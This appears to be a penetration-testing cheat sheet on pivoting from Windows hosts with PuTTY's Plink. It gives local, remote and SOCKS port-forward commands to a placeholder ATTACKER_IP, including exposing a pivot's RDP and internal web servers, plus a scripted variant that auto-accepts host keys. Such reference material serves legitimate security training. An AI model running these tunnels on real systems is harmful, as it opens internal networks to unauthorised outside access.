Overview
Plink is PuTTY’s command-line SSH client. Useful for pivoting from Windows targets that don’t have native SSH.
Download
Pre-installed on many Windows systems with PuTTY. Otherwise:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Binary: plink.exe
Local Port Forward
Access internal service from attacker via Windows pivot.
plink.exe -L LOCAL_PORT:TARGET_IP:TARGET_PORT user@ATTACKER_IP
Example
plink.exe -L 8080:10.10.10.5:80 user@ATTACKER_IP
Remote Port Forward
Expose Windows pivot’s local service to attacker.
plink.exe -R ATTACKER_PORT:127.0.0.1:LOCAL_PORT user@ATTACKER_IP
Example — Expose RDP
plink.exe -R 3390:127.0.0.1:3389 kali@ATTACKER_IP
Attacker accesses localhost:3390 → Windows pivot RDP.
Dynamic Port Forward (SOCKS)
plink.exe -D 1080 user@ATTACKER_IP
Non-Interactive (Scripted)
Accept host key automatically and provide password via echo:
echo y | plink.exe -R 3390:127.0.0.1:3389 -l kali -pw password ATTACKER_IP
Password visible in process list. Use SSH keys when possible.
With SSH Key
plink.exe -i key.ppk -R 3390:127.0.0.1:3389 kali@ATTACKER_IP
Convert OpenSSH key to PPK with PuTTYgen if needed.
Common Pivoting Scenario
Attacker (Kali) ← plink → Windows Pivot → Internal Network
# On Windows pivot — expose internal web server to attacker
plink.exe -R 8080:10.10.10.5:80 kali@ATTACKER_IP -pw password
# On attacker — access internal web
curl http://127.0.0.1:8080
Quick Reference
| Task | Command |
|---|
| Local forward | plink.exe -L PORT:TARGET:PORT user@IP |
| Remote forward | plink.exe -R PORT:127.0.0.1:PORT user@IP |
| SOCKS | plink.exe -D 1080 user@IP |
| Non-interactive | echo y | plink.exe -R ... -l user -pw pass IP |